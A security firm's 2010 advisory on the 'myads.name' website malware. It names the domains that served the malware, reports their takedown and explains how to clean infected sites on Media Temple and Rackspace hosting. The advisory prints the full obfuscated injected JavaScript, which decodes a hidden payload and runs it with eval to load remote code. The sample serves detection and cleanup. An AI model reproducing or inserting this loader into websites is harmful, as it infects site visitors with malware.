myads.name Malware

Updated: August 9, 2010

The myads.name malware places malicious JavaScript into a website's web pages and or JavaScript files that access malware located on either myads.name, adsnet.biz, toolbarcom.org, mybar.us, or freead.name. We contacted the hosting provider for those malicious websites and they were disabled at approximately 3PM MDT on August 6. On August 8, the DNS service for the domains was shut down following our contact with their provider. Until new hosting is found the malware will not be infectious. To clean the website, the website needs to be reverted to a clean backup or the malicious code needs to be removed from the web pages and or JavaScript files. The malware has been infecting websites hosted with Media Temple and Rackspace.

Recent Script Format On Web Pages:

<ads><script type="text/javascript">
this.b=this.M="";this.A="";this.w=false;this.N=""; (function(c){this.m=false;this.J="";this.G=this.e=this.l=false;var g=window;this.i="";var d=g["unescap"+unescape("%65")],h=String["f"+unescape("%72%6f%6d%43%68%61%72%43%6f%64%65")];this.C="qO";this.B="oB";var a=new String("");this.I="sW";var e=new String("%");this.d="";for(var f=0;f<c["le"+unescape("%6e%67%74%68")];f+=2){this.c="cO";this.Q=38178;a+=e+c["su"+unescape("%62%73%74%72")](f,2)}c=d(a);this.u=false;this.o="jP";this.j=false;this.k="gZ";this.s=false;d="";for(a=0;a<c["le"+unescape("%6e%67%74%68")];a++){this.H= this.h="";this.P=43510;this.r=this.z="";this.v=37015;this.F="qY";this.L=62857;this.g="eS";e=c["char"+unescape("%43%6f%64%65%41%74")](a);this.D=false;e^=232;this.q=36524;d+=h(e);this.R=this.p=""}this.f="dX";this.a="";g["e"+unescape("%76%61%6c")](d);this.t=this.K=false;return d})("9e899ac889d59f81868c879fc686899e818f899c879ac69d9b8d9aa98f8d869cc48ad5c7c09189808787949b8d899a8b8094859b868a879c949189868c8d90948f87878f848d8a879c948a81868f94899b83c1c781c48bd586899e818f899c879ac6899898be8d9a9b818786d3c8818ec08c878b9d858d869cc68b878783818dc681868c8d90a78ec0ca808784918b878783818dcac1d5d5c5d9cecec989c69c87a4879f8d9aab899b8dc0c1c685899c8b80c08ac1cece8bc69c87a4879f8d9aab899b8dc0c1c681868c8d90a78ec0ca9f8186cac1c9d5c5d9c1939e899ac88cd5b3ca8591898c9bc68689858dcac4ca898c9b868d9cc68a8192cac4ca9c8787848a899a8b8785c6879a8fcac4ca85918a899ac69d9bcac4ca8e9a8d8d898cc68689858dcab5c48dd5b3ca89908dc6cac4ca8a8790c6cac4ca8b8790c6cac4ca8c8d90c6cac4ca8e8990c6cac4ca8e8190c6cac4ca8e8790c6cac4ca8f8790c6cac4ca808d90c6cac4ca838d90c6cac4ca848990c6cac4ca848d90c6cac4ca848790c6cac4ca849d90c6cac4ca858990c6cac4ca858190c6cac4ca868190c6cac4ca879087c6cac4ca879091c6cac4ca988990c6cac4ca988190c6cac4ca988790c6cac4ca989190c6cac4ca9a8990c6cac4ca9a8d90c6cac4ca9b8990c6cac4ca9b8d90c6cac4ca9b8190c6cac4ca9b8790c6cac4ca9c8990c6cac4ca9c9d90c6cac4ca9e8d90c6cac4ca9e8790c6cac4ca9f8990c6cac4ca90819bc6cac4ca928990c6cab5c48ed5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28cc6848d868f9c80c1c48fd5a5899c80c68e8487879ac0a5899c80c69a89868c8785c0c1c28dc6848d868f9c80c1d38c9cd5868d9fc8ac899c8dd38c9cc69b8d9cbc81858dc08c9cc68f8d9cbc81858dc0c1c3d1d8dfdaaddcc1d38c878b9d858d869cc68b878783818dd5ca808784918b878783818dd5cac38d9b8b89988dc0ca808784918b878783818dcac1c3cad38d9098819a8d9bd5cac38c9cc69c87afa5bcbb9c9a81868fc0c1c3cad398899c80d5c7cad3c88c878b9d858d869cc69f9a819c8dc0cfd49b8b9a81989cc89c91988dd5ca9c8d909cc782899e899b8b9a81989ccac89b9a8bd5ca809c9c98d2c7c7cfc38db38fb5c38cb38eb5c3cfc79b919b9c8d85c78b89989c818786c6829bcad6d4b4c79b8b9a81989cd6cfc195d3"); this.n=3279;this.O=58441;</script></ads>

Recent Script Format On JavaScript Files:

Service

Website Malware Removal

White Fir Design

Web Design, Security, and Marketing

myads.name Malware

Related:

Service

Resources

You are here

myads.name Malware

Related:

Service

Resources